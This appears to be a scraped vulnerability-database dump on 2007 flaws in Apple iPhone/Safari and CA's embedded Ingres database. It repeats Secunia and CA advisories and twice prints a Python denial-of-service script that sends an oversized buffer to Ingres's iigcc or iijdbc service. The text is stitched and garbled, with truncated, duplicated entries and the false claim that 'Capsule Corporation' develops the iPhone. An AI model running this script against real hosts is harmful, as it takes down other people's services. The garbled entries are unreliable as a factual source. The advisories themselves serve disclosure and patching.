This issue affects versions prior to Safari 3 Beta Update 3.0.2. The iPhone is a smartphone developed by Capsule Corporation. There are multiple security holes in the implementation of the iPhone, which can lead to malicious operation of the browser or information leakage. The specific vulnerability entries are as follows: * CVE-2007-2400 There is a vulnerability in the implementation of Safari's processing of JavsScript. Remote attackers may use this vulnerability to bypass the same-origin policy and operate other web pages without authorization. 
----------------------------------------------------------------------
BETA test the new Secunia Personal Software Inspector!
The Secunia PSI detects installed software on your computer and
categorises it as either Insecure, End-of-Life, or Up-To-Date. 
Effectively enabling you to focus your attention on software
installations where more secure versions are available from the
vendors. 
Download the free PSI BETA from the Secunia website:
https://psi.secunia.com/
----------------------------------------------------------------------
TITLE:
Apple iPhone Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA26287
VERIFY ADVISORY:
http://secunia.com/advisories/26287/
CRITICAL:
Highly critical
IMPACT:
Cross Site Scripting, Spoofing, DoS, System access
WHERE:
>From remote
OPERATING SYSTEM:
Apple iPhone 1.x
http://secunia.com/product/15128/
DESCRIPTION:
Some vulnerabilities have been reported in Apple iPhone, which can be
exploited by malicious people to conduct cross-site scripting and
spoofing attacks, and potentially to compromise a vulnerable system. 
2) A boundary error in the Perl Compatible Regular Expressions (PCRE)
library used by the Javascript engine in Safari can be exploited to
cause a heap-based buffer overflow when a user visits a malicious web
page. 
Successful exploitation may allow execution of arbitrary code. 
3) An HTTP injection issue in XMLHttpRequest can be exploited to
inject arbitrary HTTP requests. 
For more information see vulnerability #2 in:
SA25786
4) An error in WebKit within in the handling of International Domain
Name (IDN) support and Unicode fonts embedded in Safari can be
exploited to spoof a URL by registering domain names with certain
international characters that resembles other commonly used
characters. 
5) An invalid type conversion when rendering frame sets may allow
execution of arbitrary code. 
For more information see vulnerability #1 in:
SA25786
SOLUTION:
Update to version 1.0.1 (downloadable and installable via iTunes). 
PROVIDED AND/OR DISCOVERED BY:
1) The vendor credits Lawrence Lai, Stan Switzer, and Ed Rowe of
Adobe Systems, Inc. 
2) The vendor credits Charlie Miller and Jake Honoroff of Independent
Security Evaluators. 
3) The vendor credits Richard Moore, Westpoint Ltd. 
5) The vendor credits Rhys Kidd, Westnet. 
ORIGINAL ADVISORY:
http://docs.info.apple.com/article.html?artnum=306173
OTHER REFERENCES:
SA25786:
http://secunia.com/advisories/25786/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities. 
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link. 
Secunia NEVER sends attached files with advisories. 
Secunia does not advise people to install third party patches, only
use those supplied by the vendor. 
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
                        
| VAR-200706-0347 | CVE-2007-2399 | Apple Safari cross-domain HTTP redirection race condition | CVSS V2: 9.3 CVSS V3: - Severity: HIGH | 
                            WebKit in Apple Mac OS X 10.3.9, 10.4.9 and later, and iPhone before 1.0.1 performs an "invalid type conversion", which allows remote attackers to execute arbitrary code via unspecified frame sets that trigger memory corruption. Apple Safari contains a race condition when handling HTTP redirection when updating pages.  This can allow a cross-domain violation. Apple WebCore fails to properly serialize headers into an HTTP request, which can cause a cross-domain security violation. 
An attacker may exploit this issue by enticing victims into opening a maliciously crafted HTML document. The iPhone is a smartphone developed by Capsule Corporation. There are multiple security holes in the implementation of the iPhone, which can lead to malicious operation of the browser or information leakage. The specific vulnerability entries are as follows: * CVE-2007-2399 WebKit software package has a vulnerability in processing invalid type conversion when generating web pages. 
----------------------------------------------------------------------
BETA test the new Secunia Personal Software Inspector!
The Secunia PSI detects installed software on your computer and
categorises it as either Insecure, End-of-Life, or Up-To-Date. 
Effectively enabling you to focus your attention on software
installations where more secure versions are available from the
vendors. 
Download the free PSI BETA from the Secunia website:
https://psi.secunia.com/
----------------------------------------------------------------------
TITLE:
Apple iPhone Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA26287
VERIFY ADVISORY:
http://secunia.com/advisories/26287/
CRITICAL:
Highly critical
IMPACT:
Cross Site Scripting, Spoofing, DoS, System access
WHERE:
>From remote
OPERATING SYSTEM:
Apple iPhone 1.x
http://secunia.com/product/15128/
DESCRIPTION:
Some vulnerabilities have been reported in Apple iPhone, which can be
exploited by malicious people to conduct cross-site scripting and
spoofing attacks, and potentially to compromise a vulnerable system. 
2) A boundary error in the Perl Compatible Regular Expressions (PCRE)
library used by the Javascript engine in Safari can be exploited to
cause a heap-based buffer overflow when a user visits a malicious web
page. 
3) An HTTP injection issue in XMLHttpRequest can be exploited to
inject arbitrary HTTP requests. 
For more information see vulnerability #2 in:
SA25786
4) An error in WebKit within in the handling of International Domain
Name (IDN) support and Unicode fonts embedded in Safari can be
exploited to spoof a URL by registering domain names with certain
international characters that resembles other commonly used
characters. 
For more information see vulnerability #1 in:
SA25786
SOLUTION:
Update to version 1.0.1 (downloadable and installable via iTunes). 
PROVIDED AND/OR DISCOVERED BY:
1) The vendor credits Lawrence Lai, Stan Switzer, and Ed Rowe of
Adobe Systems, Inc. 
2) The vendor credits Charlie Miller and Jake Honoroff of Independent
Security Evaluators. 
3) The vendor credits Richard Moore, Westpoint Ltd. 
5) The vendor credits Rhys Kidd, Westnet. 
ORIGINAL ADVISORY:
http://docs.info.apple.com/article.html?artnum=306173
OTHER REFERENCES:
SA25786:
http://secunia.com/advisories/25786/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities. 
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link. 
Secunia NEVER sends attached files with advisories. 
Secunia does not advise people to install third party patches, only
use those supplied by the vendor. 
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
                        
| VAR-200706-0398 | CVE-2007-3337 | CA Used in products  Ingres database server Vulnerable to arbitrary file truncation Related entries in the VARIoT exploits database: VAR-E-200706-0107 | CVSS V2: 2.1 CVSS V3: - Severity: LOW | 
                            wakeup in Ingres database server 2006 9.0.4, r3, 2.6, and 2.5, as used in multiple CA (Computer Associates) products, allows local users to truncate arbitrary files via a symlink attack on the alarmwkp.def file. Ingress Database Server included in CA eTrust Secure Content Manager is prone to multiple remote vulnerabilities, including multiple stack- and heap-based buffer-overflow issues, multiple pointer-overwrite issues, and an arbitrary-file-overwrite issue. 
Successful exploits will allow attackers to completely compromise affected computers, including executing arbitrary code with SYSTEM-level privileges and truncating the 'alarkp.def' file. 
Title: [CAID 35450, 35451, 35452, 35453]: CA Products That Embed 
Ingres Multiple Vulnerabilities
CA Vuln ID (CAID): 35450, 35451, 35452, 35453
CA Advisory Date: 2007-06-21
Reported By: NGSSoftware, and iDefense
Impact: Attackers can potentially execute arbitrary code, or 
overwrite files. 
Summary: Various CA products that embed Ingres products contain 
multiple vulnerabilities that can allow an attacker to potentially 
execute arbitrary code. CA has issued fixes, to address all of 
these vulnerabilities, for all supported CA products that may be 
affected. 
1) Ingres controllable pointer overwrite vulnerability (reported 
by NGSSoftware) [Ingres bug 115927, CVE-2007-3336, CAID 35450]
Description: An unauthenticated attacker can potentially execute 
arbitrary code within the context of the database server. 
2) Ingres remote unauthenticated pointer overwrite #2 (reported by 
NGSSoftware) [Ingres bug 115927, CVE-2007-3336, CAID 35450]
Description: An unauthenticated attacker can exploit a pointer 
overwrite vulnerability to execute arbitrary code within the 
context of the database server. 
3) Ingres wakeup file overwrite (reported by NGSSoftware) 
[Ingres bug 115913, CVE-2007-3337, CAID 35451]
Description: The "wakeup" binary creates a file named 
"alarmwkp.def" in the current directory, truncating the file if it 
already exists. The "wakeup" binary is setuid "ingres" and 
world-executable. Consequently, an attacker can truncate a file 
with the privileges of the "ingres" user. 
4) Ingres uuid_from_char stack overflow (reported by NGSSoftware) 
[Ingres bug 115911, CVE-2007-3338, CAID 35452]
Description: An attacker can pass a long string as an argument to 
uuid_from_char() to cause a stack buffer overflow and the saved 
returned address can be overwritten. 
5) Ingres verifydb local stack overflow (reported by NGSSoftware) 
[Ingres bug 115911, CVE-2007-3338, CAID 35452]
Description: A local attacker can exploit a stack overflow in the 
Ingres verifydb utility duve_get_args function. 
6) Communication server heap corruption (reported by iDefense) 
[Ingres bug 117523, CVE-2007-3334, CAID 35453]
Description: An attacker can execute arbitrary code within the 
context of the communications server (iigcc.exe). This only 
affects Ingres on the Windows operating system. Reported by 
iDefense as IDEF2023. 
7) Data Access/JDBC server heap corruption (reported by iDefense) 
[Ingres bug 117523, CVE-2007-3334, CAID 35453]
Description: An attacker can execute arbitrary code within the 
context of the Data Access server (iigcd.exe) in r3 or the JDCB 
server in older releases. This only affects Ingres on the Windows 
operating system. Reported by iDefense as IDEF2022. 
Mitigating Factors: None
Severity: CA has given these vulnerabilities a cumulative High 
risk rating. 
Affected Products:
Advantage Data Transformer r2.2
AllFusion Enterprise Workbench r1.1, 1.1 SP1, r7, r7.1
AllFusion Harvest Change Manager r7, r7.1
BrightStor ARCserve Backup v9 (Linux only), r11.1, r11.5 (Unix, 
   Linux and Mainframe Linux)
BrightStor ARCserve Backup for Laptops and Desktops r11.5
BrightStor Enterprise Backup (Unix only) r10.5
BrightStor Storage Command Center r11.5
BrightStor Storage Resource Manager r11.5
CleverPath Aion Business Rules Expert r10.1
CleverPath Aion Business Process Monitoring r10.1
CleverPath Predictive Analysis Server r3
DocServer 1.1
eTrust Admin v8, v8.1, r8.1 SP1, r8.1 SP2
eTrust Audit r8 SP2
eTrust Directory r8.1
eTrust IAM Suite r8.0
eTrust IAM Toolkit r8.0, r8.1
eTrust Identity Manager r8.1
eTrust Network Forensics r8.1
eTrust Secure Content Manager r8
eTrust Single Sign-On r7, r8, r8.1
eTrust Web Access Control 1.0
Unicenter Advanced Systems Management r11
Unicenter Asset Intelligence r11
Unicenter Asset Management r11
Unicenter Asset Portfolio Management r11.2.1, r11.3
Unicenter CCS r11
Unicenter Database Command Center r11.1
Unicenter Desktop and Server Management r11
Unicenter Desktop Management Suite r11
Unicenter Enterprise Job Manager r1 SP3, r1 SP4
Unicenter Job Management Option r11
Unicenter Lightweight Portal 2
Unicenter Management Portal r3.1.1
Unicenter Network and Systems Management r3.0, r11
Unicenter Network and Systems Management - Tiered - Multi Platform 
   r3.0 0305, r3.1 0403, r11.0
Unicenter Patch Management r11
Unicenter Remote Control 6, r11
Unicenter Service Accounting r11, r11.1
Unicenter Service Assure r2.2, r11, r11.1
Unicenter Service Catalog r11, r11.1
Unicenter Service Delivery r11.0, r11.1
Unicenter Service Intelligence r11
Unicenter Service Metric Analysis r3.0.2, r3.5, r11, r11.1
Unicenter ServicePlus Service Desk 5.5 SP3, 6.0, 6.0 SP1, r11, 
   r11.1, r11.2
Unicenter Software Delivery r11
Unicenter TNG 2.4, 2.4.2, 2.4.2J
Unicenter Workload Control Center r1 SP3, r1 SP4
Unicenter Web Services Distributed Management 3.11, 3.50
Wily SOA Manager 7.1
Affected Platforms:
All operating system platforms supported by the various CA 
products that embed Ingres. This includes Windows, Linux, and 
supported UNIX platforms. 
Status and Recommendation:
CA recommends that customers apply the appropriate fix(es) listed 
on the Security Notice page: 
http://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp
Workaround: None
References (URLs may wrap):
CA SupportConnect:
http://supportconnect.ca.com/
CA SupportConnect Security Notice for these vulnerabilities:
Ingres Security Alert
http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp
Important Security Notice for Customers Using Products That Embed 
Ingres
http://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp
CA Security Advisor posting: 
CA Products That Embed Ingres Multiple Vulnerabilities
http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778
CA Vuln ID (CAID): 35450, 35451, 35452, 35453
http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35450
http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35451
http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35452
http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35453
Ingres knowledge base document:
http://servicedesk.ingres.com/CAisd/pdmweb.ingres?OP=SHOW_DETAIL+PERSID=KD:415738+HTMPL=kt_document_view.htmpl
Reported By: NGSSoftware, and iDefense
NGSSoftware Advisory: 
http://www.ngssoftware.com/research/advisories/
iDefense Advisory: 
Ingres Database Multiple Heap Corruption Vulnerabilities
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=546
CVE References:
CVE-2007-3336, CVE-2007-3337, CVE-2007-3338, CVE-2007-3334
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3336
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3337
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3338
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3334
OSVDB References: Pending
http://osvdb.org/
Changelog for this advisory:
v1.0 - Initial Release
Customers who require additional information should contact CA
Technical Support at http://supportconnect.ca.com. 
For technical questions or comments related to this advisory, 
please send email to vuln AT ca DOT com. 
If you discover a vulnerability in CA products, please report your
findings to vuln AT ca DOT com, or utilize our "Submit a 
Vulnerability" form. 
URL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx
Regards,
Ken Williams ; 0xE2941985
Director, CA Vulnerability Research
CA, 1 CA Plaza, Islandia, NY 11749
	
Contact http://www.ca.com/us/contact/
Legal Notice http://www.ca.com/us/legal/
Privacy Policy http://www.ca.com/us/privacy/
Copyright (c) 2007 CA. All rights reserved. # Exploit Title: Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities
# Date: 2010-08-14
# Author: fdisk
# Version: 2.6
# Tested on: Windows 2003 Server SP1 en
# CVE:  CVE-2007-3334 - CVE-2007-3336 - CVE-2007-3337 - CVE-2007-3338
# Notes: Fixed in the last version. 
# please let me know if you are/were able to get code execution <rr dot fdisk at gmail dot com>
 
import socket
import sys
 
if len(sys.argv) != 4:
    print "Usage: ./CAAdvantageDoS.py <Target IP> <Port> <Service>"
    print "Vulnerable Services: iigcc, iijdbc"
    sys.exit(1)
 
host = sys.argv[1]
port = int(sys.argv[2])
service = sys.argv[3]
 
if service == "iigcc":
        payload = "\x41" * 2106
elif service == "iijdbc":
        payload = "\x41" * 1066
else:
        print "Vulnerable Services: iigcc, iijdbc"
        sys.exit(1)
 
payload += "\x42" * 4
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print "Sending payload"
s.send(payload)
data = s.recv(1024)
s.close()
print 'Received', repr(data)
 
print service + " crashed"
                        
| VAR-200706-0399 | CVE-2007-3338 | plural  CA Product  Ingres database server Vulnerable to stack-based buffer overflow Related entries in the VARIoT exploits database: VAR-E-200706-0107 | CVSS V2: 10.0 CVSS V3: - Severity: HIGH | 
                            Multiple stack-based buffer overflows in Ingres database server 2006 9.0.4, r3, 2.6, and 2.5, as used in multiple CA (Computer Associates) products, allow remote attackers to execute arbitrary code via the (1) uuid_from_char or (2) duve_get_args functions. 
Successful exploits will allow attackers to completely compromise affected computers, including executing arbitrary code with SYSTEM-level privileges and truncating the 'alarkp.def' file. 
Title: [CAID 35450, 35451, 35452, 35453]: CA Products That Embed 
Ingres Multiple Vulnerabilities
CA Vuln ID (CAID): 35450, 35451, 35452, 35453
CA Advisory Date: 2007-06-21
Reported By: NGSSoftware, and iDefense
Impact: Attackers can potentially execute arbitrary code, or 
overwrite files. CA has issued fixes, to address all of 
these vulnerabilities, for all supported CA products that may be 
affected. 
1) Ingres controllable pointer overwrite vulnerability (reported 
by NGSSoftware) [Ingres bug 115927, CVE-2007-3336, CAID 35450]
Description: An unauthenticated attacker can potentially execute 
arbitrary code within the context of the database server. 
3) Ingres wakeup file overwrite (reported by NGSSoftware) 
[Ingres bug 115913, CVE-2007-3337, CAID 35451]
Description: The "wakeup" binary creates a file named 
"alarmwkp.def" in the current directory, truncating the file if it 
already exists. The "wakeup" binary is setuid "ingres" and 
world-executable. Consequently, an attacker can truncate a file 
with the privileges of the "ingres" user. 
4) Ingres uuid_from_char stack overflow (reported by NGSSoftware) 
[Ingres bug 115911, CVE-2007-3338, CAID 35452]
Description: An attacker can pass a long string as an argument to 
uuid_from_char() to cause a stack buffer overflow and the saved 
returned address can be overwritten. 
5) Ingres verifydb local stack overflow (reported by NGSSoftware) 
[Ingres bug 115911, CVE-2007-3338, CAID 35452]
Description: A local attacker can exploit a stack overflow in the 
Ingres verifydb utility duve_get_args function. 
6) Communication server heap corruption (reported by iDefense) 
[Ingres bug 117523, CVE-2007-3334, CAID 35453]
Description: An attacker can execute arbitrary code within the 
context of the communications server (iigcc.exe). This only 
affects Ingres on the Windows operating system. Reported by 
iDefense as IDEF2023. 
7) Data Access/JDBC server heap corruption (reported by iDefense) 
[Ingres bug 117523, CVE-2007-3334, CAID 35453]
Description: An attacker can execute arbitrary code within the 
context of the Data Access server (iigcd.exe) in r3 or the JDCB 
server in older releases. This only affects Ingres on the Windows 
operating system. Reported by iDefense as IDEF2022. 
Mitigating Factors: None
Severity: CA has given these vulnerabilities a cumulative High 
risk rating. 
Affected Products:
Advantage Data Transformer r2.2
AllFusion Enterprise Workbench r1.1, 1.1 SP1, r7, r7.1
AllFusion Harvest Change Manager r7, r7.1
BrightStor ARCserve Backup v9 (Linux only), r11.1, r11.5 (Unix, 
   Linux and Mainframe Linux)
BrightStor ARCserve Backup for Laptops and Desktops r11.5
BrightStor Enterprise Backup (Unix only) r10.5
BrightStor Storage Command Center r11.5
BrightStor Storage Resource Manager r11.5
CleverPath Aion Business Rules Expert r10.1
CleverPath Aion Business Process Monitoring r10.1
CleverPath Predictive Analysis Server r3
DocServer 1.1
eTrust Admin v8, v8.1, r8.1 SP1, r8.1 SP2
eTrust Audit r8 SP2
eTrust Directory r8.1
eTrust IAM Suite r8.0
eTrust IAM Toolkit r8.0, r8.1
eTrust Identity Manager r8.1
eTrust Network Forensics r8.1
eTrust Secure Content Manager r8
eTrust Single Sign-On r7, r8, r8.1
eTrust Web Access Control 1.0
Unicenter Advanced Systems Management r11
Unicenter Asset Intelligence r11
Unicenter Asset Management r11
Unicenter Asset Portfolio Management r11.2.1, r11.3
Unicenter CCS r11
Unicenter Database Command Center r11.1
Unicenter Desktop and Server Management r11
Unicenter Desktop Management Suite r11
Unicenter Enterprise Job Manager r1 SP3, r1 SP4
Unicenter Job Management Option r11
Unicenter Lightweight Portal 2
Unicenter Management Portal r3.1.1
Unicenter Network and Systems Management r3.0, r11
Unicenter Network and Systems Management - Tiered - Multi Platform 
   r3.0 0305, r3.1 0403, r11.0
Unicenter Patch Management r11
Unicenter Remote Control 6, r11
Unicenter Service Accounting r11, r11.1
Unicenter Service Assure r2.2, r11, r11.1
Unicenter Service Catalog r11, r11.1
Unicenter Service Delivery r11.0, r11.1
Unicenter Service Intelligence r11
Unicenter Service Metric Analysis r3.0.2, r3.5, r11, r11.1
Unicenter ServicePlus Service Desk 5.5 SP3, 6.0, 6.0 SP1, r11, 
   r11.1, r11.2
Unicenter Software Delivery r11
Unicenter TNG 2.4, 2.4.2, 2.4.2J
Unicenter Workload Control Center r1 SP3, r1 SP4
Unicenter Web Services Distributed Management 3.11, 3.50
Wily SOA Manager 7.1
Affected Platforms:
All operating system platforms supported by the various CA 
products that embed Ingres. This includes Windows, Linux, and 
supported UNIX platforms. 
Status and Recommendation:
CA recommends that customers apply the appropriate fix(es) listed 
on the Security Notice page: 
http://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp
Workaround: None
References (URLs may wrap):
CA SupportConnect:
http://supportconnect.ca.com/
CA SupportConnect Security Notice for these vulnerabilities:
Ingres Security Alert
http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp
Important Security Notice for Customers Using Products That Embed 
Ingres
http://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp
CA Security Advisor posting: 
CA Products That Embed Ingres Multiple Vulnerabilities
http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778
CA Vuln ID (CAID): 35450, 35451, 35452, 35453
http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35450
http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35451
http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35452
http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35453
Ingres knowledge base document:
http://servicedesk.ingres.com/CAisd/pdmweb.ingres?OP=SHOW_DETAIL+PERSID=KD:415738+HTMPL=kt_document_view.htmpl
Reported By: NGSSoftware, and iDefense
NGSSoftware Advisory: 
http://www.ngssoftware.com/research/advisories/
iDefense Advisory: 
Ingres Database Multiple Heap Corruption Vulnerabilities
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=546
CVE References:
CVE-2007-3336, CVE-2007-3337, CVE-2007-3338, CVE-2007-3334
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3336
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3337
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3338
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3334
OSVDB References: Pending
http://osvdb.org/
Changelog for this advisory:
v1.0 - Initial Release
Customers who require additional information should contact CA
Technical Support at http://supportconnect.ca.com. 
For technical questions or comments related to this advisory, 
please send email to vuln AT ca DOT com. 
If you discover a vulnerability in CA products, please report your
findings to vuln AT ca DOT com, or utilize our "Submit a 
Vulnerability" form. 
URL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx
Regards,
Ken Williams ; 0xE2941985
Director, CA Vulnerability Research
CA, 1 CA Plaza, Islandia, NY 11749
	
Contact http://www.ca.com/us/contact/
Legal Notice http://www.ca.com/us/legal/
Privacy Policy http://www.ca.com/us/privacy/
Copyright (c) 2007 CA. All rights reserved. # Exploit Title: Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities
# Date: 2010-08-14
# Author: fdisk
# Version: 2.6
# Tested on: Windows 2003 Server SP1 en
# CVE:  CVE-2007-3334 - CVE-2007-3336 - CVE-2007-3337 - CVE-2007-3338
# Notes: Fixed in the last version. 
# please let me know if you are/were able to get code execution <rr dot fdisk at gmail dot com>
 
import socket
import sys
 
if len(sys.argv) != 4:
    print "Usage: ./CAAdvantageDoS.py <Target IP> <Port> <Service>"
    print "Vulnerable Services: iigcc, iijdbc"
    sys.exit(1)
 
host = sys.argv[1]
port = int(sys.argv[2])
service = sys.argv[3]
 
if service == "iigcc":
        payload = "\x41" * 2106
elif service == "iijdbc":
        payload = "\x41" * 1066
else:
        print "Vulnerable Services: iigcc, iijdbc"
        sys.exit(1)
 
payload += "\x42" * 4
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print "Sending payload"
s.send(payload)
data = s.recv(1024)
s.close()
print 'Received', repr(data)
 
print service + " crashed"
                        
| VAR-200706-0397 | CVE-2007-3336 | CA Used in products  Ingres database server Vulnerable to arbitrary code execution Related entries in the VARIoT exploits database: VAR-E-200706-0107 | CVSS V2: 10.0 CVSS V3: - Severity: HIGH | 
                            Multiple "pointer overwrite" vulnerabilities in Ingres database server 2006 9.0.4, r3, 2.6, and 2.5, as used in multiple CA (formerly Computer Associates) products, allow remote attackers to execute arbitrary code by sending certain TCP data at different times to the Ingres Communications Server Process (iigcc), which calls the (1) QUinsert or (2) QUremove functions with attacker-controlled input. Ingress Database Server included in CA eTrust Secure Content Manager is prone to multiple remote vulnerabilities, including multiple stack- and heap-based buffer-overflow issues, multiple pointer-overwrite issues, and an arbitrary-file-overwrite issue. 
Successful exploits will allow attackers to completely compromise affected computers, including executing arbitrary code with SYSTEM-level privileges and truncating the 'alarkp.def' file. 
Title: [CAID 35450, 35451, 35452, 35453]: CA Products That Embed 
Ingres Multiple Vulnerabilities
CA Vuln ID (CAID): 35450, 35451, 35452, 35453
CA Advisory Date: 2007-06-21
Reported By: NGSSoftware, and iDefense
Impact: Attackers can potentially execute arbitrary code, or 
overwrite files. CA has issued fixes, to address all of 
these vulnerabilities, for all supported CA products that may be 
affected. 
3) Ingres wakeup file overwrite (reported by NGSSoftware) 
[Ingres bug 115913, CVE-2007-3337, CAID 35451]
Description: The "wakeup" binary creates a file named 
"alarmwkp.def" in the current directory, truncating the file if it 
already exists. The "wakeup" binary is setuid "ingres" and 
world-executable. Consequently, an attacker can truncate a file 
with the privileges of the "ingres" user. 
4) Ingres uuid_from_char stack overflow (reported by NGSSoftware) 
[Ingres bug 115911, CVE-2007-3338, CAID 35452]
Description: An attacker can pass a long string as an argument to 
uuid_from_char() to cause a stack buffer overflow and the saved 
returned address can be overwritten. 
5) Ingres verifydb local stack overflow (reported by NGSSoftware) 
[Ingres bug 115911, CVE-2007-3338, CAID 35452]
Description: A local attacker can exploit a stack overflow in the 
Ingres verifydb utility duve_get_args function. 
6) Communication server heap corruption (reported by iDefense) 
[Ingres bug 117523, CVE-2007-3334, CAID 35453]
Description: An attacker can execute arbitrary code within the 
context of the communications server (iigcc.exe). This only 
affects Ingres on the Windows operating system. Reported by 
iDefense as IDEF2023. 
7) Data Access/JDBC server heap corruption (reported by iDefense) 
[Ingres bug 117523, CVE-2007-3334, CAID 35453]
Description: An attacker can execute arbitrary code within the 
context of the Data Access server (iigcd.exe) in r3 or the JDCB 
server in older releases. This only affects Ingres on the Windows 
operating system. Reported by iDefense as IDEF2022. 
Mitigating Factors: None
Severity: CA has given these vulnerabilities a cumulative High 
risk rating. 
Affected Products:
Advantage Data Transformer r2.2
AllFusion Enterprise Workbench r1.1, 1.1 SP1, r7, r7.1
AllFusion Harvest Change Manager r7, r7.1
BrightStor ARCserve Backup v9 (Linux only), r11.1, r11.5 (Unix, 
   Linux and Mainframe Linux)
BrightStor ARCserve Backup for Laptops and Desktops r11.5
BrightStor Enterprise Backup (Unix only) r10.5
BrightStor Storage Command Center r11.5
BrightStor Storage Resource Manager r11.5
CleverPath Aion Business Rules Expert r10.1
CleverPath Aion Business Process Monitoring r10.1
CleverPath Predictive Analysis Server r3
DocServer 1.1
eTrust Admin v8, v8.1, r8.1 SP1, r8.1 SP2
eTrust Audit r8 SP2
eTrust Directory r8.1
eTrust IAM Suite r8.0
eTrust IAM Toolkit r8.0, r8.1
eTrust Identity Manager r8.1
eTrust Network Forensics r8.1
eTrust Secure Content Manager r8
eTrust Single Sign-On r7, r8, r8.1
eTrust Web Access Control 1.0
Unicenter Advanced Systems Management r11
Unicenter Asset Intelligence r11
Unicenter Asset Management r11
Unicenter Asset Portfolio Management r11.2.1, r11.3
Unicenter CCS r11
Unicenter Database Command Center r11.1
Unicenter Desktop and Server Management r11
Unicenter Desktop Management Suite r11
Unicenter Enterprise Job Manager r1 SP3, r1 SP4
Unicenter Job Management Option r11
Unicenter Lightweight Portal 2
Unicenter Management Portal r3.1.1
Unicenter Network and Systems Management r3.0, r11
Unicenter Network and Systems Management - Tiered - Multi Platform 
   r3.0 0305, r3.1 0403, r11.0
Unicenter Patch Management r11
Unicenter Remote Control 6, r11
Unicenter Service Accounting r11, r11.1
Unicenter Service Assure r2.2, r11, r11.1
Unicenter Service Catalog r11, r11.1
Unicenter Service Delivery r11.0, r11.1
Unicenter Service Intelligence r11
Unicenter Service Metric Analysis r3.0.2, r3.5, r11, r11.1
Unicenter ServicePlus Service Desk 5.5 SP3, 6.0, 6.0 SP1, r11, 
   r11.1, r11.2
Unicenter Software Delivery r11
Unicenter TNG 2.4, 2.4.2, 2.4.2J
Unicenter Workload Control Center r1 SP3, r1 SP4
Unicenter Web Services Distributed Management 3.11, 3.50
Wily SOA Manager 7.1
Affected Platforms:
All operating system platforms supported by the various CA 
products that embed Ingres. This includes Windows, Linux, and 
supported UNIX platforms. 
Status and Recommendation:
CA recommends that customers apply the appropriate fix(es) listed 
on the Security Notice page: 
http://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp
Workaround: None
References (URLs may wrap):
CA SupportConnect:
http://supportconnect.ca.com/
CA SupportConnect Security Notice for these vulnerabilities:
Ingres Security Alert
http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp
Important Security Notice for Customers Using Products That Embed 
Ingres
http://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp
CA Security Advisor posting: 
CA Products That Embed Ingres Multiple Vulnerabilities
http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778
CA Vuln ID (CAID): 35450, 35451, 35452, 35453
http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35450
http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35451
http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35452
http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35453
Ingres knowledge base document:
http://servicedesk.ingres.com/CAisd/pdmweb.ingres?OP=SHOW_DETAIL+PERSID=KD:415738+HTMPL=kt_document_view.htmpl
Reported By: NGSSoftware, and iDefense
NGSSoftware Advisory: 
http://www.ngssoftware.com/research/advisories/
iDefense Advisory: 
Ingres Database Multiple Heap Corruption Vulnerabilities
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=546
CVE References:
CVE-2007-3336, CVE-2007-3337, CVE-2007-3338, CVE-2007-3334
